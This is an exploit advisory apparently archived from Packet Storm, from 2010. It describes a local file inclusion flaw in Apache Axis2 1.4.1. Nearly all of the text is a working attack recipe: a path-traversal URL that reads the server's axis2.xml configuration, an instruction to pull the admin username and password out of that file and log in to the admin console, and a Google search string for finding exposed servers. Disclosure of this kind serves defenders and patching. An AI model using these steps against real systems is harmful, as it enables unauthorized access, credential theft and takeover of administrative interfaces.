Apache Axis2 1.4.1 Local File Inclusion

2010-05-25T00:00:00
ID PACKETSTORM:89892
Type packetstorm
Reporter HC
Modified 2010-05-25T00:00:00

Description

                                        
                                            `  
  
# Exploit Title: Apache Axis2(1.4.1) Local File Inclusion Vulnerability  
# Date: 2010/5/24  
# Author: HC  
# Software Link: http://ws.apache.org/axis2/download/1_4_1/download.cgi  
# Version: Axis2 1.4.1  
# Tested on: Linux  
# category: Webapps  
# Code :  
  
1.http://Domain Name/axis2/services/xxxxxxx?xsd=../conf/axis2.xml  
(ex: http://Domain Name/axis2/services/Version?xsd=../conf/axis2.xml)  
  
2. search keyword "password". (Get username and password)  
  
  
3. Login http://Domain Name/axis2/axis2-admin/  
  
  
google: inurl:"axis2/services" "list Services"  
  
  
  
`